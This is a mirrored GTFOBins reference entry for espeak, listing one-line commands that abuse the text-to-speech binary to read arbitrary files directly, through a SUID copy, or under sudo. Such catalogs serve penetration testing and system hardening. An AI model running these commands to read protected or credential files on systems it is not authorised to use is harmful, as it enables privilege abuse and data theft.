1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-07 20:50:38 +02:00
GTFOBins.github.io/_gtfobins/espeak.md
pad0van 6f87df3530
Add espeak
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
2022-12-16 15:00:52 +01:00

408 B

description functions
The file content appears in the middle of other textual information, thus it might not be suitable to read arbitray binary files.
file-read suid sudo
code
LFILE=file_to_read espeak -qXf "$LFILE"
code
LFILE=file_to_read ./espeak -qXf "$LFILE"
code
LFILE=file_to_read sudo espeak -qXf "$LFILE"